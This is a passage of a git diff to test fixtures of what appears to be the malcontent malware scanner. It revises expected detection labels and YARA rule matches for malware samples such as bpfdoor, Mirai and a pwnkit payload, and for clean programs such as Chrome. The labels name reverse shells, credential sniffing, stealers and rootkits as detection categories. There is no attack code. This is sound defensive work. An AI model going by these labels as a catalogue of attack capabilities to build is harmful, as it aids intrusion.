fs/path/usr_local: medium fs/path/var: low impact/infection/worm: medium impact/remote_access/trojan: medium -lateral/scan/tool: medium net/download: medium net/http/fake_user_agent: high net/http/form_upload: medium diff --git a/tests/javascript/clean/faker.min.js.simple b/tests/javascript/clean/faker.min.js.simple index d16220b08..5baafcaa1 100644 --- a/tests/javascript/clean/faker.min.js.simple +++ b/tests/javascript/clean/faker.min.js.simple @@ -9,7 +9,6 @@ data/compression/bzip2: low data/compression/gzip: low data/encoding/json_decode: low data/encoding/json_encode: low -evasion/file/location/tmp_x11_unix: low exec/plugin: low exfil/office_file_ext: medium exfil/stealer/credit_card: medium @@ -21,7 +20,6 @@ fs/path/usr_local: medium fs/path/var: low impact/infection/worm: medium impact/remote_access/trojan: medium -lateral/scan/tool: medium net/download: medium net/http/fake_user_agent: high net/http/form_upload: medium diff --git a/tests/javascript/clean/frequency_lists.js.simple b/tests/javascript/clean/frequency_lists.js.simple index 6f90669ac..c3fd38930 100644 --- a/tests/javascript/clean/frequency_lists.js.simple +++ b/tests/javascript/clean/frequency_lists.js.simple @@ -17,7 +17,6 @@ impact/remote_access/agent: medium impact/remote_access/heartbeat: medium impact/remote_access/implant: medium impact/remote_access/trojan: medium -lateral/scan/tool: medium net/download: medium net/ip/multicast_send: low net/ip/spoof: medium diff --git a/tests/javascript/clean/mode-php.js.simple b/tests/javascript/clean/mode-php.js.simple index 0d3f79a79..a6b8442a6 100644 --- a/tests/javascript/clean/mode-php.js.simple +++ b/tests/javascript/clean/mode-php.js.simple @@ -11,6 +11,8 @@ data/encoding/base64: low data/encoding/reverse: low data/hash/md5: low data/random/insecure: low +discover/process/effective_groupid_get: medium +discover/process/parent_pid_get: low discover/system/hostname_get: low discover/system/platform: low discover/user/USER: low @@ -57,7 +59,5 @@ net/url/embedded: low net/url/encode: medium persist/daemon: medium process/chroot: low -process/effective_groupid_get: medium process/groupid_set: low -process/parent_pid_get: low process/userid_set: low diff --git a/tests/javascript/clean/mode-php_laravel_blade.js.simple b/tests/javascript/clean/mode-php_laravel_blade.js.simple index e929ec3b9..5bb3f1e5c 100644 --- a/tests/javascript/clean/mode-php_laravel_blade.js.simple +++ b/tests/javascript/clean/mode-php_laravel_blade.js.simple @@ -11,6 +11,8 @@ data/encoding/base64: low data/encoding/reverse: low data/hash/md5: low data/random/insecure: low +discover/process/effective_groupid_get: medium +discover/process/parent_pid_get: low discover/system/hostname_get: low discover/system/platform: low discover/user/USER: low @@ -57,7 +59,5 @@ net/url/embedded: low net/url/encode: medium persist/daemon: medium process/chroot: low -process/effective_groupid_get: medium process/groupid_set: low -process/parent_pid_get: low process/userid_set: low diff --git a/tests/javascript/clean/php.js.simple b/tests/javascript/clean/php.js.simple index 18a7d482d..a4cf97734 100644 --- a/tests/javascript/clean/php.js.simple +++ b/tests/javascript/clean/php.js.simple @@ -9,6 +9,8 @@ data/compression/gzip: low data/encoding/base64: low data/encoding/reverse: low data/random/insecure: low +discover/process/effective_groupid_get: medium +discover/process/parent_pid_get: low discover/system/hostname_get: low discover/system/platform: low discover/user/USER: low @@ -53,7 +55,5 @@ net/socket/send: low net/url/embedded: low net/url/encode: medium process/chroot: low -process/effective_groupid_get: medium process/groupid_set: low -process/parent_pid_get: low process/userid_set: low diff --git a/tests/javascript/clean/securityDashboards.plugin.js.simple b/tests/javascript/clean/securityDashboards.plugin.js.simple index 171f88260..726acf13c 100644 --- a/tests/javascript/clean/securityDashboards.plugin.js.simple +++ b/tests/javascript/clean/securityDashboards.plugin.js.simple @@ -26,7 +26,6 @@ impact/remote_access/heartbeat: medium impact/remote_access/implant: medium impact/remote_access/trojan: medium lateral/scan/brute_force: low -lateral/scan/tool: medium net/download: medium net/http/form_upload: medium net/http/post: medium diff --git a/tests/javascript/clean/zxcvbn.js.simple b/tests/javascript/clean/zxcvbn.js.simple index e44886620..6d5f6c344 100644 --- a/tests/javascript/clean/zxcvbn.js.simple +++ b/tests/javascript/clean/zxcvbn.js.simple @@ -21,7 +21,6 @@ impact/remote_access/heartbeat: medium impact/remote_access/implant: medium impact/remote_access/trojan: medium lateral/scan/brute_force: low -lateral/scan/tool: medium net/download: medium net/ip/multicast_send: low net/ip/spoof: medium diff --git a/tests/linux/2021.FontOnLake/45E9.elf.simple b/tests/linux/2021.FontOnLake/45E9.elf.simple index c66a9ab9b..c637f8aae 100644 --- a/tests/linux/2021.FontOnLake/45E9.elf.simple +++ b/tests/linux/2021.FontOnLake/45E9.elf.simple @@ -16,7 +16,7 @@ discover/user/HOME: low discover/user/USER: low evasion/bypass_security/linux/pam: medium evasion/bypass_security/linux/se: medium -evasion/file/location/tmp_x11_unix: low +evasion/file/location/x11_unix: low evasion/file/prefix: medium evasion/file/prefix/proc: high evasion/logging/acct: low @@ -63,7 +63,6 @@ impact/remote_access/reverse_shell: medium impact/remote_access/ssh: high impact/rootkit: critical impact/ui/x11_auth: medium -lateral/scan/tool: medium malware/family/fontonlake: critical net/download: medium net/ip/spoof: medium diff --git a/tests/linux/2021.XMR-Stak/1b1a56.elf.simple b/tests/linux/2021.XMR-Stak/1b1a56.elf.simple index 7602a71ba..0bc855b82 100644 --- a/tests/linux/2021.XMR-Stak/1b1a56.elf.simple +++ b/tests/linux/2021.XMR-Stak/1b1a56.elf.simple @@ -15,6 +15,7 @@ data/hash/blake2b: low data/hash/sha1: low data/random/insecure: low discover/network/interface_get: low +discover/process/runtime_deps: medium discover/system/cpu_info: low discover/system/platform: low discover/system/sysinfo: medium @@ -86,4 +87,3 @@ privesc/sudo: medium process/create: low process/multithreaded: low process/name_set: medium -process/thread_local_storage: medium diff --git a/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md b/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md index 5905cae77..2c6aa011c 100644 --- a/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md +++ b/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md @@ -4,6 +4,5 @@ |----------|---------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------|----------| | CRITICAL | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#single_load_rwe) | Binary with a single LOAD segment marked RWE, by Tenable | | | HIGH | [anti-static/binary/tiny](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/tiny.yara#impossibly_small_elf_program) | ELF binary is unusually small | | -| HIGH | [anti-static/packer/elf](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/elf.yara#obfuscated_elf) | Obfuscated ELF binary (missing symbols) | | | MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | | diff --git a/tests/linux/2022.bpfdoor/bpfdoor_2.simple b/tests/linux/2022.bpfdoor/bpfdoor_2.simple index 80d372626..0c0f91b34 100644 --- a/tests/linux/2022.bpfdoor/bpfdoor_2.simple +++ b/tests/linux/2022.bpfdoor/bpfdoor_2.simple @@ -1,7 +1,6 @@ # linux/2022.bpfdoor/bpfdoor_2: critical 3P/elastic/bpfdoor: critical credential/sniffer/pcap: high -evasion/file/location/tmp_x11_unix: low evasion/logging/hide_shell_history: high exec/program: medium exec/program/background: low diff --git a/tests/linux/2022.ez-pwnkit/payload.simple b/tests/linux/2022.ez-pwnkit/payload.simple index 5f6a0a3e8..944a8619e 100644 --- a/tests/linux/2022.ez-pwnkit/payload.simple +++ b/tests/linux/2022.ez-pwnkit/payload.simple @@ -20,7 +20,6 @@ impact/exploit/GCONV_PATH: high impact/exploit/cve: high impact/exploit/pwnkit: critical impact/remote_access/reverse_shell: medium -lateral/scan/tool: medium net/dns: low net/dns/servers: low net/dns/txt: low diff --git a/tests/linux/2023.ConnectBack/tiny.md b/tests/linux/2023.ConnectBack/tiny.md index 65dc88375..57f5fa934 100644 --- a/tests/linux/2023.ConnectBack/tiny.md +++ b/tests/linux/2023.ConnectBack/tiny.md @@ -4,6 +4,5 @@ |----------|---------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------|----------| | CRITICAL | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#single_load_rwe) | Binary with a single LOAD segment marked RWE, by Tenable | | | HIGH | [anti-static/binary/tiny](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/tiny.yara#impossibly_small_elf_program) | ELF binary is unusually small | | -| HIGH | [anti-static/packer/elf](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/elf.yara#obfuscated_elf) | Obfuscated ELF binary (missing symbols) | | | MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | | diff --git a/tests/linux/2023.Gafgyt/5636cddb43.elf.x86.simple b/tests/linux/2023.Gafgyt/5636cddb43.elf.x86.simple index 83d98a90b..10f71a219 100644 --- a/tests/linux/2023.Gafgyt/5636cddb43.elf.x86.simple +++ b/tests/linux/2023.Gafgyt/5636cddb43.elf.x86.simple @@ -15,6 +15,7 @@ fs/path/usr_sbin_telnetd: high fs/proc/net_route: high impact/ddos: critical impact/ddos/raw_flooder: medium +lateral/scan/tool: medium net/dns/servers: low net/http/fake_user_agent: medium net/ip/parse: medium diff --git a/tests/linux/2024.Beast/wyoming-xray-undress-robert.simple b/tests/linux/2024.Beast/wyoming-xray-undress-robert.simple index 77a248d51..457f20255 100644 --- a/tests/linux/2024.Beast/wyoming-xray-undress-robert.simple +++ b/tests/linux/2024.Beast/wyoming-xray-undress-robert.simple @@ -1,6 +1,7 @@ # linux/2024.Beast/wyoming-xray-undress-robert: critical fs/path/dev: medium fs/path/tmp: medium +hw/dev/ubi: low impact/ransom/linux: high impact/shutdown: medium lateral/vmware/vms: medium diff --git a/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple b/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple index e86abfca0..1e8293eaa 100644 --- a/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple +++ b/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple @@ -53,7 +53,6 @@ impact/exploit/cve_list: medium impact/remote_access/kill_rm: medium impact/remote_access/reverse_shell: high impact/remote_access/systemctl: critical -lateral/scan/tool: medium lateral/ssh/attack: high malware/family/kaiji: critical net/dns: low diff --git a/tests/linux/2024.Mirai/ppc.simple b/tests/linux/2024.Mirai/ppc.simple index fdf8eff46..63989f0ad 100644 --- a/tests/linux/2024.Mirai/ppc.simple +++ b/tests/linux/2024.Mirai/ppc.simple @@ -5,7 +5,6 @@ fs/proc/cpuinfo: medium fs/proc/stat: medium hw/cpu: medium impact/remote_access/router: high -lateral/scan/tool: medium malware/family/mirai: critical net/ip/parse: medium net/socket/local_addr: low diff --git a/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple b/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple index adfdcbd45..27c58ccb8 100644 --- a/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple +++ b/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple @@ -46,7 +46,6 @@ fs/permission/chown: medium fs/permission/modify: medium impact/ransom/note: high impact/remote_access/reverse_shell: medium -lateral/scan/tool: medium net/dns: low net/dns/servers: low net/dns/txt: low diff --git a/tests/linux/2024.chisel/crondx.simple b/tests/linux/2024.chisel/crondx.simple index ce62875f6..3c58b6b40 100644 --- a/tests/linux/2024.chisel/crondx.simple +++ b/tests/linux/2024.chisel/crondx.simple @@ -27,7 +27,6 @@ fs/path/etc_hosts: medium fs/path/etc_resolv.conf: low fs/permission/chown: medium fs/permission/modify: medium -lateral/scan/tool: medium net/dns: low net/dns/servers: low net/dns/txt: low diff --git a/tests/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple b/tests/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple index f0e9223d4..a6f56798e 100644 --- a/tests/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple +++ b/tests/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple @@ -44,7 +44,6 @@ fs/permission/chown: medium fs/permission/modify: medium impact/cryptojacking/nicehash_pool: high impact/cryptojacking/xmrig: high -lateral/scan/tool: medium net/dns: low net/dns/reverse: medium net/dns/servers: low diff --git a/tests/linux/2024.gas/gas.simple b/tests/linux/2024.gas/gas.simple index 85fcb740d..2765835ac 100644 --- a/tests/linux/2024.gas/gas.simple +++ b/tests/linux/2024.gas/gas.simple @@ -28,7 +28,6 @@ hw/cpu: medium impact/exploit/GCONV_PATH: low impact/remote_access/dl_iterate: high impact/remote_access/reverse_shell: medium -lateral/scan/tool: medium net/socket/send: low net/url/embedded: low process/create: low diff --git a/tests/linux/2024.kubo_injector/injector.json b/tests/linux/2024.kubo_injector/injector.json index 457ebb356..3f5fcee65 100644 --- a/tests/linux/2024.kubo_injector/injector.json +++ b/tests/linux/2024.kubo_injector/injector.json @@ -96,9 +96,9 @@ ], "RiskScore": 3, "RiskLevel": "HIGH", - "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/pid-exe.yara#proc_exe", + "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/pid-exe.yara#proc_s_exe", "ID": "fs/proc/pid_exe", - "RuleName": "proc_exe" + "RuleName": "proc_s_exe" }, { "Description": "access process memory maps", @@ -123,6 +123,17 @@ "ID": "fs/symlink_resolve", "RuleName": "realpath" }, + { + "Description": "expected ubi users", + "MatchStrings": [ + "Usage:" + ], + "RiskScore": 1, + "RiskLevel": "LOW", + "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/dev/ubi.yara#expected_ubi_users", + "ID": "hw/dev/ubi", + "RuleName": "expected_ubi_users" + }, { "Description": "Buffer overflow exploit", "MatchStrings": [ diff --git a/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple b/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple index 580ffc3ed..0c30336b6 100644 --- a/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple +++ b/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple @@ -6,7 +6,6 @@ anti-behavior/vm_check: medium c2/addr/http_dynamic: medium c2/addr/ip: medium -c2/addr/url: high c2/discovery/ip_dns_resolver: medium c2/tool_transfer/download: medium collect/archives/unarchive: medium @@ -104,7 +103,6 @@ impact/remote_access/kill_rm: medium impact/remote_access/net_exec: medium impact/remote_access/pseudo_terminal: medium impact/remote_access/reverse_shell: high -lateral/scan/tool: medium malware/family/emp3r0r: critical net/dns: low net/dns/over_https: medium diff --git a/tests/linux/2024.kworker_pretenders/gafgyt.simple b/tests/linux/2024.kworker_pretenders/gafgyt.simple index 5abb9cf5a..4950c2eed 100644 --- a/tests/linux/2024.kworker_pretenders/gafgyt.simple +++ b/tests/linux/2024.kworker_pretenders/gafgyt.simple @@ -23,7 +23,6 @@ fs/path/usr_sbin: low fs/path/var: low fs/proc/arbitrary_pid: medium fs/proc/self_exe: medium -lateral/scan/tool: medium net/dns/servers: low net/http/request: low net/socket/send: low diff --git a/tests/linux/2024.medusa/rkload.simple b/tests/linux/2024.medusa/rkload.simple index fce1bdc25..3c878f390 100644 --- a/tests/linux/2024.medusa/rkload.simple +++ b/tests/linux/2024.medusa/rkload.simple @@ -8,7 +8,7 @@ discover/system/cpu_info: low discover/system/sysinfo: medium evasion/file/location/dev_shm: high evasion/file/location/lib: high -evasion/file/location/system_directories: medium +evasion/file/location/system_directory: medium evasion/file/prefix: high evasion/file/prefix/dev: critical evasion/file/prefix/lib: high @@ -41,7 +41,6 @@ fs/tempdir/TMPDIR: low hw/cpu: medium impact/exploit/GCONV_PATH: low impact/remote_access/reverse_shell: medium -lateral/scan/tool: medium malware/family/medusa: critical net/socket/local_addr: low net/socket/send: low diff --git a/tests/linux/UPX/06ed158.md b/tests/linux/UPX/06ed158.md index 54b37428f..0b0edb9e0 100644 --- a/tests/linux/UPX/06ed158.md +++ b/tests/linux/UPX/06ed158.md @@ -2,7 +2,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|-------------------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------|------------------------------------------------------| -| HIGH | [anti-static/elf/entropy](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/entropy.yara#normal_elf_high_entropy_7_2) | high entropy ELF binary (>7.2) | | +| HIGH | [anti-static/elf/entropy](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/entropy.yara#normal_elf_high_entropy_7_2) | high entropy ELF binary (>7.4) | | | HIGH | [anti-static/packer/elf](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/elf.yara#obfuscated_elf) | Obfuscated ELF binary (missing symbols) | | | HIGH | [anti-static/packer/high_entropy](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/high_entropy.yara#high_entropy_7_9) | high entropy binary (>7.9) | | | HIGH | [anti-static/packer/upx](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/upx.yara#upx) | Binary is packed with UPX | [UPX!](https://github.com/search?q=UPX%21&type=code) | diff --git a/tests/linux/clean/appsec-rules.json.simple b/tests/linux/clean/appsec-rules.json.simple index 0de75e3f4..5a9782f48 100644 --- a/tests/linux/clean/appsec-rules.json.simple +++ b/tests/linux/clean/appsec-rules.json.simple @@ -52,7 +52,6 @@ hw/wireless: low impact/exploit: medium impact/exploit/cve: medium impact/remote_access/iptables: medium -lateral/scan/tool: medium net/dns/servers: low net/download: medium net/http/cookies: medium diff --git a/tests/linux/clean/busybox.simple b/tests/linux/clean/busybox.simple index 9c9a4fa2a..19b37a061 100644 --- a/tests/linux/clean/busybox.simple +++ b/tests/linux/clean/busybox.simple @@ -10,6 +10,7 @@ data/random/insecure: low discover/group/lookup: medium discover/network/interface_get: low discover/network/netstat: medium +discover/process/parent_pid_get: low discover/processes/pgrep: medium discover/system/cpu_info: low discover/system/platform: low @@ -88,5 +89,4 @@ process/executable_path: low process/groupid_set: low process/groups_set: low process/namespace_set: low -process/parent_pid_get: low process/userid_set: low diff --git a/tests/linux/clean/caddy.simple b/tests/linux/clean/caddy.simple index b144dd59e..9970d0eed 100644 --- a/tests/linux/clean/caddy.simple +++ b/tests/linux/clean/caddy.simple @@ -38,6 +38,7 @@ discover/cloud/aws_metadata: low discover/cloud/google_metadata: low discover/group/lookup: medium discover/network/mac_address: medium +discover/process/parent_pid_get: low discover/system/cpu_info: low discover/system/hostname_get: low discover/system/platform: medium @@ -147,6 +148,5 @@ persist/pid_file: medium privesc/sudo: medium process/chroot: low process/groups_set: low -process/parent_pid_get: low sus/exclamation: medium sus/intercept: medium diff --git a/tests/linux/clean/chezmoi.simple b/tests/linux/clean/chezmoi.simple index 8d70e7c8a..b0c8a3db3 100644 --- a/tests/linux/clean/chezmoi.simple +++ b/tests/linux/clean/chezmoi.simple @@ -46,6 +46,7 @@ data/hash/md5: low data/random/insecure: low discover/group/lookup: medium discover/network/mac_address: medium +discover/process/parent_pid_get: low discover/system/cpu_info: low discover/system/hostname_get: low discover/system/platform: low @@ -153,7 +154,6 @@ privesc/sudo: medium process/chdir: low process/chroot: low process/groups_set: low -process/parent_pid_get: low sus/exclamation: medium sus/intercept: medium sus/malicious: medium diff --git a/tests/linux/clean/chrome.simple b/tests/linux/clean/chrome.simple index 202202cb5..bbd2dfbff 100644 --- a/tests/linux/clean/chrome.simple +++ b/tests/linux/clean/chrome.simple @@ -38,6 +38,9 @@ data/hash/sha1: low data/random/insecure: low discover/network/interface_list: medium discover/network/mac_address: medium +discover/process/name_get: medium +discover/process/parent_pid_get: low +discover/process/runtime_deps: medium discover/processes/list: medium discover/system/hostname_get: low discover/system/platform: low @@ -162,9 +165,6 @@ process/chroot: low process/create: low process/groups_set: low process/multithreaded: low -process/name_get: medium -process/parent_pid_get: low -process/thread_local_storage: medium process/userid_set: low sus/exclamation: medium sus/intercept: medium diff --git a/tests/linux/clean/clickhouse.simple b/tests/linux/clean/clickhouse.simple index dc8a4d60e..4868ecd1d 100644 --- a/tests/linux/clean/clickhouse.simple +++ b/tests/linux/clean/clickhouse.simple @@ -45,6 +45,8 @@ discover/cloud/google_metadata: low discover/network/interface_get: low discover/network/interface_list: medium discover/permissions/capabilities: medium +discover/process/name_get: medium +discover/process/runtime_deps: medium discover/processes/list: medium discover/system/cpu_info: low discover/system/hostname_get: low @@ -181,8 +183,6 @@ process/create: low process/executable_path: low process/groupid_set: low process/multithreaded: low -process/name_get: medium -process/thread_local_storage: medium process/userid_set: low sus/exclamation: medium sus/intercept: medium diff --git a/tests/linux/clean/code-oss.md b/tests/linux/clean/code-oss.md index 8b919a187..eede9cc16 100644 --- a/tests/linux/clean/code-oss.md +++ b/tests/linux/clean/code-oss.md @@ -2,7 +2,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_http_url_with_question) | contains hardcoded endpoint with a question mark | [http://arianna.libero.it/search/abin/integrata.cgi?query=](http://arianna.libero.it/search/abin/integrata.cgi?query=)
[http://autocomplete.nigma.ru/complete/query_help.php?suggest=true&q=](http://autocomplete.nigma.ru/complete/query_help.php?suggest=true&q=)
[http://search.goo.ne.jp/sgt.jsp?MT=](http://search.goo.ne.jp/sgt.jsp?MT=)
[http://search.goo.ne.jp/web.jsp?MT=](http://search.goo.ne.jp/web.jsp?MT=)
[http://search.incredibar.com/search.php?q=](http://search.incredibar.com/search.php?q=)
[http://search.sweetim.com/search.asp?q=](http://search.sweetim.com/search.asp?q=)
[http://searchfunmoods.com/results.php?q=](http://searchfunmoods.com/results.php?q=)
[http://start.sweetpacks.com/search.asp?q=](http://start.sweetpacks.com/search.asp?q=)
[https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js?rcl=dd10454c1d](https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js?rcl=dd10454c1d)
[https://m.so.com/index.php?ie=](https://m.so.com/index.php?ie=)
[https://search.goo.ne.jp/sgt.jsp?MT=](https://search.goo.ne.jp/sgt.jsp?MT=)
[https://search.goo.ne.jp/web.jsp?MT=](https://search.goo.ne.jp/web.jsp?MT=)
[https://search.privacywall.org/suggest.php?q=](https://search.privacywall.org/suggest.php?q=)
[https://search.yahoo.com?fr=crmas_sfp](https://search.yahoo.com?fr=crmas_sfp)
[https://sugg.sogou.com/sugg/ajaj_json.jsp?type=addrbar&key=](https://sugg.sogou.com/sugg/ajaj_json.jsp?type=addrbar&key=) | +| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_php_url_with_question) | contains hardcoded endpoint with a question mark | [http://autocomplete.nigma.ru/complete/query_help.php?suggest=true&q=](http://autocomplete.nigma.ru/complete/query_help.php?suggest=true&q=)
[http://search.incredibar.com/search.php?q=](http://search.incredibar.com/search.php?q=)
[http://searchfunmoods.com/results.php?q=](http://searchfunmoods.com/results.php?q=)
[https://m.so.com/index.php?ie=](https://m.so.com/index.php?ie=)
[https://search.privacywall.org/suggest.php?q=](https://search.privacywall.org/suggest.php?q=) | | MEDIUM | [3P/threat_hunting/google_remote_desktop](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#Google_Remote_Desktop_greyware_tool_keyword) | [references 'Google Remote Desktop' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [inomeogfingihgjfjlpeplalcfajhgai](https://github.com/search?q=inomeogfingihgjfjlpeplalcfajhgai&type=code) | | MEDIUM | [3P/threat_hunting/proxmark](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#Proxmark_offensive_tool_keyword) | [references 'Proxmark' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [ProxMark](https://github.com/search?q=ProxMark&type=code) | | MEDIUM | [anti-behavior/LD_DEBUG](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/LD_DEBUG.yara#env_LD_DEBUG) | Checks if dynamic linker debugging is enabled | [LD_DEBUG](https://github.com/search?q=LD_DEBUG&type=code) | @@ -26,6 +26,8 @@ | MEDIUM | [data/embedded/base64_url](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-base64-url.yara#contains_base64_url) | Contains base64 url | [aHR0cDovL::$http](https://github.com/search?q=aHR0cDovL%3A%3A%24http&type=code)
[h0dHA6Ly::$http](https://github.com/search?q=h0dHA6Ly%3A%3A%24http&type=code)
[h0dHBzOi8v::$https](https://github.com/search?q=h0dHBzOi8v%3A%3A%24https&type=code)
[odHRwOi8v::$http](https://github.com/search?q=odHRwOi8v%3A%3A%24http&type=code)
[odHRwczovL::$https](https://github.com/search?q=odHRwczovL%3A%3A%24https&type=code) | | MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [[](https://github.com/search?q=%3Chtml%3E&type=code)
[DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) | | MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code)
[ifconfig](https://github.com/search?q=ifconfig&type=code)
[networkInterfaces](https://github.com/search?q=networkInterfaces&type=code) | +| MEDIUM | [discover/process/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/name-get.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | +| MEDIUM | [discover/process/runtime_deps](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/runtime_deps.yara#tls_get_addr) | [looks up thread private variables, may be used for loaded library discovery](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | | MEDIUM | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#npm_uname) | [get system identification](https://nodejs.org/api/process.html) | [process.arch](https://github.com/search?q=process.arch&type=code)
[process.platform](https://github.com/search?q=process.platform&type=code)
[process.versions](https://github.com/search?q=process.versions&type=code) | | MEDIUM | [discover/system/sysinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/sysinfo.yara#sysinfo) | [get system information (load, swap)](https://man7.org/linux/man-pages/man2/sysinfo.2.html) | [sysinfo](https://github.com/search?q=sysinfo&type=code) | | MEDIUM | [discover/user/info](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/userinfo.yara#userinfo) | returns user info for the current process | [os.homedir](https://github.com/search?q=os.homedir&type=code) | @@ -59,7 +61,7 @@ | MEDIUM | [impact/ransom/decryptor](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/ransom/decryptor.yara#decryptor) | References 'decryptor' | [decryptor](https://github.com/search?q=decryptor&type=code) | | MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [Failed to deserialized Heartbeat info pa](https://github.com/search?q=Failed+to+deserialized+Heartbeat+info+pa&type=code)
